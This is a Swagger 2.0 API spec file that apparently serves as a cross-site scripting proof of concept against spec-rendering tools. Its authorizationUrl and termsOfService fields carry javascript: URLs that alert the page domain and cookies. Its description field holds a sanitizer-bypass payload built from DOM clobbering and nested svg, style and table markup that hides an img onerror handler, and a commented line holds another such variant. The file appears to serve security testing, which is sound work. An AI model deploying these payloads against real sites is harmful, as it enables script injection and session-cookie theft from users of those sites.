swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: pw1nc3
#  description: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(document.cookie) src>">'
  description: '<div*200>
<form><input name="parentNode">
<div*200>
<form></form><form><input name="parentNode">
<div*105>
<table>
  <caption>
    <svg>
      <desc>
        <table><caption></caption></table>
      </desc>
      <style><a title="</svg></style><img src onerror=alert(1)>"></a></style>
      </svg>
  </caption>
</table>'
  termsOfService: "javascript:alert(document.cookie)"
paths:
  /:
    get:
      responses:
        200:
          description: Echo GET